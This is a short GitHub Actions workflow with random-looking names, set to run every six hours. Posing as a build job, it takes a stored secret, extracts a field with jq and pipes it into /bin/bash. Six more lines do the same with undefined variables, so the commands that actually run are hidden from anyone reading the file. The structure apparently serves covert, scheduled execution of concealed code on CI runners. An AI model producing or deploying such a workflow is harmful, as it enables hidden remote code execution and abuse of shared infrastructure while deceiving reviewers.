name: trianglebreadline
on:
  workflow_dispatch:
  schedule:
    - cron: '26 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: trianglebreadline
        env:
          fni7: ${{ secrets.fni7 }}
        run: |
          echo $fni7 | jq -r .dnnq623 | /bin/bash
          echo $vnpy757 | jq -r .mg218 | /bin/bash
          echo $q10336 | jq -r .srb52815 | /bin/bash
          echo $ajlu6 | jq -r .z2764 | /bin/bash
          echo $jssee8 | jq -r .cwp9840 | /bin/bash
          echo $qn3 | jq -r .tz7635 | /bin/bash
          echo $splo3 | jq -r .bhq298 | /bin/bash

